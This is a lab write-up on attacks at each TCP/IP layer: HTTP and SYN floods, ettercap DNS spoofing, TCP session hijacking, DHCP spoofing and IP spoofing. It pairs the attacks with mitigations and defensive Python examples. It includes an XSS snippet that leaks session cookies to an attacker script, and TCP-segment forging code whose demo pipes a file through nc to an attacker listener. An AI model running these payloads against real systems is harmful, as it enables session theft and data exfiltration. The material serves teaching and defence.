Cybersec Experiment
Aim
To study TCP/IP Security Model, and perform attacks on each layer of TCP/IP model
Theory
TCP/IP Model
TCP/IP stands for Transmission Control Protocol/Internet Protocol. The TCP/IP model describes how hosts
are connected to the Internet and how data is carried between them: TCP provides a reliable end-to-end
byte stream on top of IP, which itself is an unreliable, best-effort internetwork service. The model allows
many separate computer networks to be joined into one virtual network, so that communication works over
large distances and across networks that are administered independently.
Application Layer
The application layer is the scope within which applications, or processes, create user data and
communicate this data to other applications on another or the same host. The applications make use of the
services provided by the underlying lower layers, especially the transport layer which provides reliable or
unreliable pipes to other processes. The communications partners are characterized by the application
architecture, such as the client–server model and peer-to-peer networking. This is the layer in which all
application protocols, such as SMTP, FTP, SSH, HTTP, operate. Processes are addressed via ports which
essentially represent services.
Transport Layer
The transport layer performs host-to-host communications on either the local network or remote networks
separated by routers. It provides a channel for the communication needs of applications. UDP is the
basic transport layer protocol, providing an unreliable connectionless datagram service. The Transmission
Control Protocol (TCP) provides flow control, connection establishment, and reliable, ordered delivery of data.
Internet Layer
The internet layer exchanges datagrams across network boundaries. It provides a uniform networking
interface that hides the actual topology (layout) of the underlying network connections. It is therefore also
the layer that establishes internetworking. Indeed, it defines and establishes the Internet. This layer
defines the addressing and routing structures used for the TCP/IP protocol suite. The primary protocol in
this scope is the Internet Protocol, which defines IP addresses. Its function in routing is to transport
datagrams to the next host, functioning as an IP router, that has the connectivity to a network closer to the
final data destination.
Link Layer
The link layer defines the networking methods within the scope of the local network link on which hosts
communicate without intervening routers. This layer includes the protocols used to describe the local
network topology and the interfaces needed to effect the transmission of Internet layer datagrams to
next-neighbor hosts.
Attacks possible:
Layer | Attack
Link  | ARP spoofing, MAC flooding
References:
https://www.researchgate.net/publication/322653426_A_Study_on_Different_Attacks_on_Transport_Network_and_Data_Link_Layer_in_TCPIP
http://seclab.cs.sunysb.edu/sekar/papers/netattacks.pdf
Experimentation
1) HTTP Flood Attack
An HTTP flood attack is a type of application-layer distributed denial-of-service (DDoS) attack
designed to overwhelm a targeted server with HTTP requests. Once the target has been saturated
with requests and is unable to respond to normal traffic, denial of service will occur for
additional requests from actual users.
HTTP flood attacks are application layer (layer 7) DDoS attacks and target application protocols
such as HTTP. HTTP is the basis of browser-based Internet requests, and is commonly used to
load web pages or to send form contents over the Internet. Mitigating application layer attacks is
particularly complex, as the malicious traffic is difficult to distinguish from normal traffic: every
request is well-formed, and the rate from any single source can be modest.
In order to achieve maximum efficiency, malicious actors will commonly employ or create
botnets in order to maximize the impact of their attack. By utilizing many devices infected with malware,
an attacker is able to leverage their efforts by launching a larger volume of attack traffic.
HTTP GET attack - In this form of attack, multiple computers or other devices are coordinated
to send multiple requests for images, files, or some other asset from a targeted server. When the target is
inundated with incoming requests and responses, denial-of-service will occur to additional requests from
legitimate traffic sources.
HTTP POST attack - Typically when a form is submitted on a website, the server must handle
the incoming request and push the data into a persistence layer, most often a database. The process of
handling the form data and running the necessary database commands is relatively intensive compared to
the amount of processing power and bandwidth required to send the POST request. This attack exploits that
disparity in relative resource consumption by sending many POST requests directly to a targeted server
until its capacity is saturated and denial of service occurs.
Prevention
One method is to implement a challenge to the requesting machine in order to test whether or not
it is a bot, much like a CAPTCHA test commonly found when creating an account online. A requirement
such as a JavaScript computational challenge screens out simple scripted clients that do not execute
JavaScript, and mitigates many attacks.
Other avenues for stopping HTTP floods include per-source rate limiting, the use of a web application
firewall (WAF), managing an IP reputation database in order to track and selectively block malicious
traffic, and on-the-fly analysis by engineers. Large providers such as Cloudflare, which fronts over 20
million Internet properties, can analyze traffic from a variety of sources and mitigate potential attacks
with quickly updated WAF rules and other mitigation strategies to eliminate application layer DDoS traffic.
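The per-source rate check described above, as an added example written for this report (it is not code from the original experiment or from any WAF product). It parses access log lines in the common "combined" format and keeps a sliding window of request timestamps per client IP, with a lower limit for POST requests because each one costs the server more than a GET. The log lines, IP addresses and thresholds are constructed for the demo.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# "combined"-style access log line: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (ip, timestamp, method, path) or None for an unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m["ip"], datetime.strptime(m["ts"], TS_FMT), m["method"], m["path"]


def detect_floods(lines, window=timedelta(seconds=10), req_limit=50, post_limit=10):
    """Sliding-window rate check per source IP, the kind of rule a WAF applies.
    POSTs get a lower limit because each one costs the server more (form handling,
    database writes) than a GET.  Returns {ip: reason} for flagged sources."""
    history = defaultdict(lambda: {"all": deque(), "post": deque()})
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, _path = rec
        buckets = ("all", "post") if method == "POST" else ("all",)
        for key in buckets:
            q = history[ip][key]
            q.append(ts)
            while ts - q[0] > window:        # evict timestamps outside the window
                q.popleft()
        if ip in flagged:
            continue
        n_post, n_all = len(history[ip]["post"]), len(history[ip]["all"])
        if n_post > post_limit:
            flagged[ip] = f"{n_post} POSTs within {window.seconds}s"
        elif n_all > req_limit:
            flagged[ip] = f"{n_all} requests within {window.seconds}s"
    return flagged


def build_sample_log():
    """Constructed traffic for the demo: one browsing user, one GET-flood bot
    hammering a static asset, one POST-flood bot hitting the login form."""
    t0 = datetime(2023, 10, 10, 13, 55, 0, tzinfo=timezone.utc)
    events = []

    def emit(ip, secs, method, path):
        ts = (t0 + timedelta(seconds=secs)).strftime(TS_FMT)
        events.append((secs, f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" 200 512'))

    for i in range(20):                    # 2 requests/s for 10 s: normal browsing
        emit("198.51.100.4", i / 2, "GET", f"/page{i}.html")
    for i in range(200):                   # 40 requests/s for 5 s: HTTP GET flood
        emit("203.0.113.7", i / 40, "GET", "/images/logo.png")
    for i in range(30):                    # 5 POSTs/s for 6 s: HTTP POST flood
        emit("203.0.113.9", i / 5, "POST", "/login")
    return [line for _, line in sorted(events)]


if __name__ == "__main__":
    for ip, why in detect_floods(build_sample_log()).items():
        print(f"block {ip}: {why}")
```

A real deployment keys the window on more than the source address (a botnet spreads the load across thousands of IPs, each under the limit), which is why the text pairs rate limiting with challenges and reputation data.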
Implementation
(Screenshots: attacker machine; victim machine before the attack; victim machine during the attack.)
2) DNS Cache Poisoning
DNS cache poisoning is the act of entering false information into a DNS cache, so that DNS
queries return an incorrect response and users are directed to the wrong websites. DNS cache poisoning is
also known as 'DNS spoofing.' IP addresses are the 'room numbers' of the Internet, enabling web traffic to
arrive in the right places. DNS resolver caches are the 'campus directory,' and when they store faulty
information, traffic goes to the wrong places until the cached information is corrected. (Note that this
does not actually disconnect the real websites from their real IP addresses.)
Because there is typically no way for DNS resolvers to verify the data in their caches, incorrect DNS
information remains in the cache until the time to live (TTL) expires, or until it is removed manually. A
number of vulnerabilities make DNS poisoning possible, but the chief problem is that DNS was built for a
much smaller Internet and based on a principle of trust (much like BGP). A more secure DNS protocol
called DNSSEC aims to solve some of these problems, but it has not been widely adopted yet.
Attackers can poison DNS caches by impersonating DNS nameservers: they make a request to a DNS
resolver and then forge the reply when the DNS resolver queries a nameserver. This is possible
because DNS uses UDP rather than TCP, and because, without DNSSEC, the resolver has no way to
authenticate the information it receives.
Instead of using TCP, which requires both communicating parties to perform a 'handshake' to initiate
communication (proving at least that the peer can receive packets at the address it claims), DNS requests
and responses use UDP, the User Datagram Protocol. With UDP, there is no guarantee that a connection is
open, that the recipient is ready to receive, or that the sender is who they say they are. UDP is
vulnerable to forging for this reason: an attacker can send a message via UDP and pretend it's a response
from a legitimate server by forging the source address in the IP header.
If a DNS resolver receives a forged response, it accepts and caches the data uncritically because there is
no way to verify if the information is accurate and comes from a legitimate source. DNS was created in
the early days of the Internet, when the only parties connected to it were universities and research centers.
There was no reason to expect that anyone would try to spread fake DNS information.
Despite these major points of vulnerability in the DNS caching process, DNS poisoning attacks are not
easy. Because the DNS resolver does actually query the authoritative nameserver, attackers have only a
few milliseconds to send the fake reply before the real reply from the authoritative nameserver arrives.
Attackers also have to either know or guess a number of factors to carry out DNS spoofing attacks:
● Which DNS queries are not cached by the targeted DNS resolver, so that the resolver will query
the authoritative nameserver
● What port* the DNS resolver is using – resolvers used to use the same source port for every query,
but now they use a different, random port each time
● The 16-bit transaction ID number of the request
● Which authoritative nameserver the query will go to
Attackers could also gain access to the DNS resolver in some other way. If a malicious party operates,
hacks, or gains physical access to a DNS resolver, they can more easily alter cached data.
*In networking, a port is a virtual point of communication reception. Computers have multiple ports, each
with their own number, and for computers to talk to each other, certain ports have to be designated for
certain kinds of communication. For instance, HTTP communications go to port 80 by default, and HTTPS
to port 443.
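The four checks a plain resolver can make on a UDP reply, and why source-port randomization matters, as an added example written for this report (not code from the original experiment or from any resolver). The DNS wire-format helpers are written here for the demo; the names, addresses and the attacker's assumption of a fixed source port 53 are constructed. The attacker sweeps every 16-bit transaction ID while spoofing the nameserver's address; with a fixed resolver port exactly one guess lands, with a random port none of the 65,536 do.

```python
import random
import struct


# --- minimal DNS wire format (RFC 1035), written for this example ---
def encode_name(name):
    return b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split(".")) + b"\x00"


def build_query(txid, name):
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)     # QR=0, RD=1, 1 question
    return header + encode_name(name) + struct.pack("!HH", 1, 1)   # QTYPE=A, QCLASS=IN


def build_answer(txid, name, ip, ttl=86400):
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)     # QR=1, RD+RA, 1 answer
    question = encode_name(name) + struct.pack("!HH", 1, 1)
    rdata = bytes(int(o) for o in ip.split("."))
    # 0xC00C is a compression pointer back to the question name at offset 12
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + rdata
    return header + question + answer


def parse_question_name(pkt):
    i, labels = 12, []
    while pkt[i]:
        n = pkt[i]
        labels.append(pkt[i + 1:i + 1 + n].decode())
        i += 1 + n
    return ".".join(labels)


# --- the resolver's view of one in-flight query ---
class OutstandingQuery:
    def __init__(self, name, nameserver, rng, random_port):
        self.name = name
        self.nameserver = nameserver
        self.txid = rng.randrange(1 << 16)
        # Legacy resolvers reused one source port (assumed 53 here); modern ones
        # pick a random ephemeral port per query.
        self.sport = rng.randrange(1024, 1 << 16) if random_port else 53


def resolver_accepts(q, src_ip, dst_port, pkt):
    """The only checks a non-DNSSEC resolver can make on a UDP reply: it came from
    the server we asked, to the port we used, with our TXID, and it repeats our
    question.  Anything passing all four is cached for its TTL."""
    txid, flags, *_ = struct.unpack("!HHHHHH", pkt[:12])
    return bool(src_ip == q.nameserver and dst_port == q.sport and txid == q.txid
                and flags & 0x8000 and parse_question_name(pkt) == q.name)


def brute_force(q, forged_ip, guessed_port):
    """Attacker sweeps all TXIDs, spoofing the nameserver's address, in the window
    before the genuine reply arrives.  Returns how many forged replies were accepted."""
    hits = 0
    for txid in range(1 << 16):
        if resolver_accepts(q, q.nameserver, guessed_port, build_answer(txid, q.name, forged_ip)):
            hits += 1
    return hits


def run(random_port, seed=7):
    rng = random.Random(seed)
    q = OutstandingQuery("www.example.com", "192.0.2.53", rng, random_port)
    return brute_force(q, "203.0.113.66", guessed_port=53)


if __name__ == "__main__":
    print("fixed source port:  forged replies accepted =", run(random_port=False))
    print("random source port: forged replies accepted =", run(random_port=True))
```

With port randomization the attacker must guess port and TXID together (about 2^32 combinations) and must do so repeatedly before the real answer lands; DNSSEC removes the guessing game entirely by letting the resolver verify a signature instead of trusting the four fields.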
Implementation:
Attacker Machine: Kali Linux
Victim Machine: Windows
On the attacker machine we created an HTML page (index_new.html) that victims will be redirected to
while demonstrating the attack.
We start the web server of attacker machine
In ettercap's configuration file (etter.conf) we change ec_uid = 65534 and ec_gid = 65534 to ec_uid = 0 and ec_gid = 0, so that ettercap does not drop root privileges after startup.
We start the ettercap application by typing
ettercap -G
In the attacker machine (Kali) terminal, we click on the three dots icon (Ettercap menu) -> Hosts -> Scan Hosts.
On clicking Hosts list, we get a table of IPs and their MAC addresses.
Selecting 192.168.0.104 , we click on Add to Target 1.
Now, in the Mitm menu, we click on Arp poisoning and select Optional parameter of
After this, we click on Plugins in the Ettercap menu -> Manage Plugins -> dns_spoof. The plugin answers
intercepted DNS queries with the records configured in ettercap's etter.dns file, so those entries must
point at the attacker machine's IP address.
We have successfully conducted the DNS spoofing attack. Note what ettercap actually does here: with ARP
poisoning it sits on the path between the victim and the gateway and forges replies to the victim's own
queries. This is on-path DNS spoofing on the LAN, not poisoning of a remote resolver's cache as described
above.
On the victim machine, during this attack, any HTTP website gets redirected to the attacker machine's
web page. HTTPS sites are not silently redirected, because the attacker's server cannot present a valid
certificate for the spoofed name and the browser refuses the connection.
3) SYN Flood Attack
SYN flood attacks work by exploiting the handshake process of a TCP connection. Under normal
conditions, a TCP connection is established in three distinct steps:
➢ First, the client sends a SYN packet to the server in order to initiate the connection.
➢ The server then responds to that initial packet with a SYN/ACK packet, in order to acknowledge
the communication.
➢ Finally, the client returns an ACK packet to acknowledge the receipt of the packet from the
server. After completing this sequence of packet sending and receiving, the TCP connection is
open and able to send and receive data.
To create denial of service, an attacker exploits the fact that after an initial SYN packet has been
received, the server will respond back with one or more SYN/ACK packets and wait for the final step in
the handshake. Here's how it works:
1. The attacker sends a high volume of SYN packets to the targeted server, often with spoofed IP
addresses, so that the SYN/ACKs go to hosts that never answer.
2. The server responds to each connection request and allocates an entry for it in its SYN backlog,
waiting for the response.
3. While the server waits for the final ACK packet, which never arrives, the attacker continues to
send more SYN packets. Each new SYN packet causes the server to hold a half-open connection entry
for a certain length of time (retransmitting the SYN/ACK several times before giving up), and once
the backlog is full the server drops new SYNs, including those from legitimate clients.
In networking, when a server is leaving a connection open but the machine on the other side of the
connection is not, the connection is considered half-open. In this type of DDoS attack, the targeted server
is continuously leaving open connections and waiting for each connection to timeout before the ports
become available again. The result is that this type of attack can be considered a “half-open attack”.
Prevention / Mitigation
SYN flood vulnerability has been known for a long time and a number of mitigation pathways have been
utilized. A few approaches include:
Each operating system on a targeted device has a certain number of half-open connections that it will
allow. One response to high volumes of SYN packets is to increase the maximum number of possible
half-open connections the operating system will allow. In order to successfully increase the maximum
backlog, the system must reserve additional memory resources to deal with all the new requests. If the
system does not have enough memory to be able to handle the increased backlog queue size, system
performance will be negatively impacted, but that still may be better than denial-of-service.
Another mitigation strategy involves overwriting the oldest half-open connection once the backlog has
been filled. This strategy requires that the legitimate connections can be fully established in less time than
the backlog can be filled with malicious SYN packets. This particular defense fails when the attack
volume is increased, or if the backlog size is too small to be practical.
SYN cookies
This strategy involves the creation of a cookie by the server. In order to avoid the risk of dropping
connections when the backlog has been filled, the server responds to each connection request with a
SYN-ACK packet but then drops the SYN request from the backlog, removing the request from memory
and leaving the port open and ready to make a new connection. If the connection is a legitimate request,
and a final ACK packet is sent from the client machine back to the server, the server will then reconstruct
(with some limitations) the SYN backlog queue entry. While this mitigation effort does lose some
information about the TCP connection, it is better than allowing denial-of-service to occur to legitimate
users as a result of an attack.
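The SYN cookie construction described above, as an added example written for this report (not code from the original experiment or from any operating system's TCP stack). It follows the classic layout: 5 bits of a 64-second time counter, 3 bits selecting an MSS from a small table, and 24 bits of a keyed hash over the connection 4-tuple and the counter. The server stores nothing; when an ACK arrives with no backlog entry it recomputes the hash from the ACK's addresses and ports. The secret, the MSS table and the addresses are assumptions for the demo. The "limitations" the text mentions are visible in the code: only the MSS survives, and only in coarse steps.

```python
import hashlib
import hmac
import os
import struct

# MSS values a cookie can encode; 3 bits of the ISN select one of them.
MSS_TABLE = (536, 1220, 1440, 1460)
# Server secret, assumed to be generated at boot (real stacks keep two and rotate).
SECRET = os.urandom(32)


def _tag(saddr, daddr, sport, dport, counter):
    """24-bit keyed hash over the connection 4-tuple and the time counter."""
    msg = struct.pack("!4s4sHHI", saddr, daddr, sport, dport, counter)
    return int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:3], "big")


def make_syn_cookie(saddr, daddr, sport, dport, mss, now):
    """Server ISN for the SYN/ACK when the backlog is full.  Layout (Bernstein's
    scheme): 5 bits of a 64-second time counter, 3 bits of MSS index, 24 bits of
    hash.  Nothing is stored; the client must echo ISN+1 in its ACK."""
    t = (now // 64) & 0x1F
    m = max((i for i, v in enumerate(MSS_TABLE) if v <= mss), default=0)
    return (t << 27) | (m << 24) | _tag(saddr, daddr, sport, dport, t)


def check_syn_cookie(saddr, daddr, sport, dport, ack_num, now):
    """On an ACK with no backlog entry, recover the cookie from ack-1 and validate it.
    Returns the MSS to use for the reconstructed connection, or None if the cookie
    is forged or older than one counter tick (64-128 s)."""
    cookie = (ack_num - 1) & 0xFFFFFFFF
    t, m, h = cookie >> 27, (cookie >> 24) & 0x7, cookie & 0xFFFFFF
    if ((now // 64) - t) & 0x1F > 1:
        return None
    if m >= len(MSS_TABLE) or h != _tag(saddr, daddr, sport, dport, t):
        return None
    return MSS_TABLE[m]


if __name__ == "__main__":
    client, server = bytes([192, 168, 0, 104]), bytes([192, 168, 0, 105])
    isn = make_syn_cookie(client, server, 49152, 80, mss=1460, now=1_000_000)
    print("SYN/ACK seq:", hex(isn))
    print("valid ACK  ->", check_syn_cookie(client, server, 49152, 80, isn + 1, 1_000_030))
    print("stale ACK  ->", check_syn_cookie(client, server, 49152, 80, isn + 1, 1_000_200))
    print("wrong port ->", check_syn_cookie(client, server, 49153, 80, isn + 1, 1_000_030))
```

Because the cookie is only 32 bits, an attacker who can guess it can complete a connection without ever receiving the SYN/ACK (a 1-in-2^24 chance per ACK for a given 4-tuple and tick), which is why stacks only switch cookies on under pressure rather than using them for every connection.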
Implementation
● Attacker Machine : Kali Linux
● Victim Machine : Ubuntu OS
● Machine Used to check ping results : Windows
Pinging the target machine from the Windows machine using the ping command. We can see that the
response time from the target machine is very low (around 1 ms).
Now we flood the victim machine by making SYN requests using the hping3 tool in Kali Linux. This will
flood the target machine by making continuous SYN requests for TCP connection
Now when we ping the target machine from the Windows machine we can see the significant delay in the
response and many requests also getting timed out.
System Monitor on Victim Machine (screenshots): before the attack; during the attack.
4) TCP Session Hijacking
In TCP session hijacking, an attacker injects packets or commands into an active communication
between two nodes on a network and disguises itself as one of the authenticated users. This type of attack
is possible because authentication typically is only done at the start of a TCP session; afterwards the
server accepts any segment that carries the right addresses, ports and sequence numbers.
Another type of session hijacking is known as a man-in-the-middle attack, where the attacker, using a
sniffer, can observe the communication between devices and collect the data that is transmitted.
There are many ways to do Session Hijacking. Some of them are given below –
In the above figure, it can be seen that the attacker captures the victim’s session ID to gain access to the
server by using some packet sniffers.
Attackers can also capture a victim's session ID with an XSS attack using JavaScript. If an attacker
sends a crafted link carrying malicious JavaScript to the victim, the script runs in the victim's browser
when the link is clicked and carries out the attacker's instructions, for example sending the session
cookie to a server the attacker controls:
<script type="text/javascript">
  // read the session cookie and leak it to the attacker's server inside an image request
  var adr = '../attacker.php?victim_cookie=' + encodeURIComponent(document.cookie);
  new Image().src = adr;
</script>
Session cookies set with the HttpOnly flag are not readable through document.cookie, which defeats this
particular way of stealing them.
IP Spoofing
Spoofing is pretending to be someone else. This is a technique used to gain unauthorized access to the
computer with an IP address of a trusted host. In implementing this technique, an attacker has to obtain
the IP address of the client and inject his own packets spoofed with the IP address of client into the TCP
session, so as to fool the server that it is communicating with the victim i.e. the original host.
Blind Attack
If an attacker is not able to sniff packets and guess the correct sequence number expected by the server,
brute force combinations of sequence numbers can be tried.
Prevention / Mitigation
To defend a network against session hijacking, a defender has to implement security measures at both the
application level and the network level. Network level hijacks can be prevented by encrypting the traffic,
so that the hijacker cannot read the packets to obtain information which will aid in spoofing, and by
authenticating each packet, so that injected segments are rejected. This protection can be provided by
protocols such as IPsec, TLS (SSL) and SSH. IPsec encrypts and authenticates packets under a key shared
between the two parties involved in the communication. IPsec runs in two modes: Transport and Tunnel.
In Transport Mode only the payload of the packet is protected, while in Tunnel Mode the whole original
packet, including its IP header, is encapsulated and protected inside a new outer packet, so the inner
addresses are hidden as well. At the application level, session cookies should carry the HttpOnly and
Secure flags so that scripts cannot read them and they are never sent over plain HTTP.
Implementation
We installed the telnet on the server machine and made changes in the
configuration for the host.
We enabled the telnet client on the client machine (Windows 10) by running pkgmgr /iu:"TelnetClient"
from the Windows Run dialog.
Before making the connection we started capturing packets using wireshark in the
attacker machine
Then we made the telnet connection between client and server by running the command
telnet <host_ip>, and entered the login id and password of the host.
We opened the last TCP packet of the session in Wireshark and noted its source port, sequence number
and acknowledgement number. Using these values we crafted, with scapy, a TCP segment that appears to
come from the client and carries a command to read a file on the server, and had its output sent to a
listener on port 33267 on the attacker machine, where we printed the file contents.
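What the scapy step has to get right, shown in plain Python as an added example written for this report (not the experiment's own scapy script). It builds a raw TCP segment with a correct checksum over the IPv4 pseudo-header, parses a constructed "last packet of the telnet session", and forges the segment the server expects next: the same ports, the sequence number advanced by the observed payload length, the acknowledgement number unchanged, and the client's IP as source. The addresses, ports, file name and the nc listener command are assumptions for the demo.

```python
import struct


def _checksum(data):
    """RFC 1071 Internet checksum (ones' complement sum of 16-bit words)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_tcp_segment(src_ip, dst_ip, sport, dport, seq, ack, payload, flags=0x018):
    """20-byte TCP header (no options) + payload, checksummed over the IPv4
    pseudo-header.  Default flags PSH|ACK: a data segment in an established session."""
    hdr = struct.pack("!HHIIHHHH", sport, dport, seq, ack, (5 << 12) | flags, 8192, 0, 0)
    pseudo = struct.pack("!4s4sBBH", src_ip, dst_ip, 0, 6, len(hdr) + len(payload))
    csum = _checksum(pseudo + hdr + payload)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:] + payload


def verify_tcp_checksum(src_ip, dst_ip, segment):
    pseudo = struct.pack("!4s4sBBH", src_ip, dst_ip, 0, 6, len(segment))
    return _checksum(pseudo + segment) == 0


def parse_tcp(segment):
    sport, dport, seq, ack, off_flags = struct.unpack("!HHIIH", segment[:14])
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": off_flags & 0x1FF, "payload": segment[(off_flags >> 12) * 4:]}


def hijack_segment(observed, client_ip, server_ip, command):
    """Given the last client->server segment seen on the wire (the source port,
    sequence and acknowledgement numbers noted from Wireshark), forge the segment
    the server expects next: same ports, seq advanced by the observed payload
    length, ack unchanged, and the client's IP as source."""
    next_seq = (observed["seq"] + len(observed["payload"])) & 0xFFFFFFFF
    return build_tcp_segment(client_ip, server_ip, observed["sport"], observed["dport"],
                             next_seq, observed["ack"], command.encode())


if __name__ == "__main__":
    client, server = bytes([192, 168, 0, 104]), bytes([192, 168, 0, 105])
    # Constructed "last packet of the telnet session": the client typed "ls" + Enter.
    wire = build_tcp_segment(client, server, 49152, 23, 1000, 5000, b"ls\r\n")
    observed = parse_tcp(wire)
    # Hypothetical injected command; file name, attacker IP and the use of nc are assumptions.
    forged = hijack_segment(observed, client, server, "cat notes.txt | nc 192.168.0.103 33267\r\n")
    f = parse_tcp(forged)
    print(f"seq={f['seq']} ack={f['ack']} checksum ok={verify_tcp_checksum(client, server, forged)}")
```

Two things the lab glosses over: the real client will also receive the server's reply and answer it with an ACK carrying the old sequence number, and the two sides then trade ACKs until one resets the connection (an "ACK storm"), so a practical hijack also desynchronises or silences the genuine client, which is what the ARP poisoning in the ettercap setup provides. And all of this only works because telnet is cleartext: against SSH the attacker could forge a segment with the right numbers but not an authenticated record inside it.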
5) DHCP Spoofing
What is DHCP?
DHCP (Dynamic Host Configuration Protocol) is an application layer network management protocol that
provides a quick, automatic and central system for the distribution and assignment of IP addresses and
TCP/IP configuration information for clients in a network.
DHCP can be used to assign subnet mask information, default gateway IP addresses, domain name
system (DNS) addresses, and more.
DHCP spoofing attack methods
By default, the DHCP protocol uses no form of authentication and is sent on broadcast, so potentially any
device on the network could receive and possibly tamper with the messages. Let’s consider what could
happen if an attacker were to combine attacks – for example, DHCP starvation and Rogue DHCP – to
launch a Man-In-The-Middle attack (MITM).
In a DHCP starvation attack, an attacker sends the DHCP server many DHCPDISCOVER/DHCPREQUEST
messages with spoofed source MAC addresses within a short time span in order to deplete the server's pool
of available IP addresses. The "starved" DHCP server will not respond to new DHCP requests until an
address becomes available, so a rogue server no longer has to win a race against the legitimate one.
A DHCP starvation attack sets the stage for the attacker to pass himself off as the DHCP server and send
out spoofed messages to trick other clients on the network.
Now the attacker can set up his own rogue DHCP server, listen for incoming broadcast requests, and send
out spoofed responses with malicious configurations. Usually, the attacker will aim to set himself as the
DNS server and default gateway for the clients.
The attacker then runs a DNS server on port 53 of his machine, so that every DNS resolution request from
the clients reaches him, allowing him to choose which names to answer with his own address.
The DHCP snooping feature on Cisco and Juniper switches can be used to mitigate a DHCP server
spoofing attack. With this mechanism, switch ports are configured in one of two states, trusted or
untrusted. Only a trusted port (the one leading to the legitimate DHCP server or the uplink) may carry
DHCP server messages (OFFER, ACK, NAK). If a server message from an attacker arrives on an untrusted
port, the switch drops it and, depending on configuration, can also err-disable the port; a per-port rate
limit on client DHCP messages blunts starvation attempts in the same way.
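The two snooping rules above, implemented against constructed DHCP messages, as an added example written for this report (not code from the original experiment or from any switch vendor). The message builder and parser handle the RFC 2131 fixed fields plus option 53; the filter rejects server messages (BOOTREPLY) on untrusted ports and caps the number of distinct client MACs seen on an untrusted port, a simplification of the per-port rate limit real switches apply. Port names, MAC addresses and the cap are assumptions for the demo.

```python
import struct

BOOTREQUEST, BOOTREPLY = 1, 2
MAGIC = b"\x63\x82\x53\x63"
MSG_TYPES = {1: "DISCOVER", 2: "OFFER", 3: "REQUEST", 5: "ACK", 6: "NAK"}


def build_dhcp(op, xid, chaddr, msg_type, yiaddr=b"\0\0\0\0"):
    """Constructed DHCP message: RFC 2131 fixed fields, magic cookie, option 53, end."""
    fixed = struct.pack("!BBBBIHH4s4s4s4s16s64s128s",
                        op, 1, 6, 0, xid, 0, 0,
                        b"\0\0\0\0", yiaddr, b"\0\0\0\0", b"\0\0\0\0",
                        chaddr.ljust(16, b"\0"), b"\0" * 64, b"\0" * 128)
    return fixed + MAGIC + bytes([53, 1, msg_type, 255])


def parse_dhcp(pkt):
    """Return op, client MAC and the option-53 message type, or None if not DHCP."""
    if len(pkt) < 241 or pkt[236:240] != MAGIC:
        return None
    msg_type, i = None, 240
    while i < len(pkt) and pkt[i] != 255:        # walk TLV options until END
        if pkt[i] == 0:                          # PAD
            i += 1
            continue
        code, length = pkt[i], pkt[i + 1]
        if code == 53 and length == 1:
            msg_type = pkt[i + 2]
        i += 2 + length
    return {"op": pkt[0], "chaddr": pkt[28:34], "type": MSG_TYPES.get(msg_type, msg_type)}


class DhcpSnooper:
    """Switch-style DHCP snooping.  Server messages (BOOTREPLY: OFFER/ACK/NAK) are
    only accepted on trusted ports, which defeats a rogue server on an access port.
    Untrusted ports also get a cap on distinct client MACs, a simplification of
    the per-port rate limit real switches use, which catches a starvation flood
    of DISCOVERs with rotating source MACs."""

    def __init__(self, trusted_ports, max_client_macs=20):
        self.trusted = set(trusted_ports)
        self.max_client_macs = max_client_macs
        self.macs_seen = {}                     # port -> set of chaddr values

    def filter(self, port, pkt):
        d = parse_dhcp(pkt)
        if d is None:
            return "drop: not a DHCP message"
        if port in self.trusted:
            return f"allow: {d['type']} (trusted port)"
        if d["op"] == BOOTREPLY:
            return f"drop: {d['type']} from untrusted port {port} (rogue server)"
        seen = self.macs_seen.setdefault(port, set())
        seen.add(d["chaddr"])
        if len(seen) > self.max_client_macs:
            return f"drop: {len(seen)} client MACs on {port} (starvation?)"
        return f"allow: {d['type']}"


if __name__ == "__main__":
    snoop = DhcpSnooper(trusted_ports={"Gi1/0/1"}, max_client_macs=5)
    pc = bytes.fromhex("0242ac110002")
    print(snoop.filter("Gi1/0/7", build_dhcp(BOOTREQUEST, 0x1234, pc, 1)))                       # client DISCOVER
    print(snoop.filter("Gi1/0/1", build_dhcp(BOOTREPLY, 0x1234, pc, 2, b"\xc0\xa8\x00\x50")))   # genuine OFFER
    print(snoop.filter("Gi1/0/7", build_dhcp(BOOTREPLY, 0x1234, pc, 2, b"\xc0\xa8\x00\x63")))   # rogue OFFER
    for i in range(1, 8):                                                                        # starvation
        print(snoop.filter("Gi1/0/9", build_dhcp(BOOTREQUEST, i, bytes([0, 0, 0, 0, 0, i]), 1)))
```

Real switches additionally check that the chaddr field matches the Ethernet source MAC of the frame, and record the IP-to-MAC bindings learned from ACKs on trusted ports; that binding table is what dynamic ARP inspection and IP source guard consult later.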
Implementation
(Screenshots: dropping the current IP address on the client; checking the current DHCP service provider;
the DHCP discover request, where the assigned IP is in the range of our rogue server's pool; the DHCP
message exchanges.)
6) IP Spoofing
IP spoofing is the creation of Internet Protocol (IP) packets which have a modified source address in order
to either hide the identity of the sender, to impersonate another computer system, or both. It is a technique
often used by bad actors to launch DDoS attacks against a target device or the surrounding infrastructure,
both to hide the attacking hosts and, in reflection attacks, to direct the replies at the victim.
While IP spoofing itself can't be prevented, measures can be taken to stop spoofed packets from entering or
leaving a network. A very common defense against spoofing is ingress filtering, outlined in BCP 38 (RFC 2827,
a Best Current Practice document). Ingress filtering is a form of packet filtering usually implemented on a
network edge device which examines incoming IP packets and looks at their source addresses. If the source
address of a packet does not belong to the prefixes expected on the interface it arrived on (for example, a
packet from the Internet claiming an internal address), the packet is rejected; routers commonly implement
this as a unicast reverse-path forwarding (uRPF) check. Some networks will also implement egress filtering,
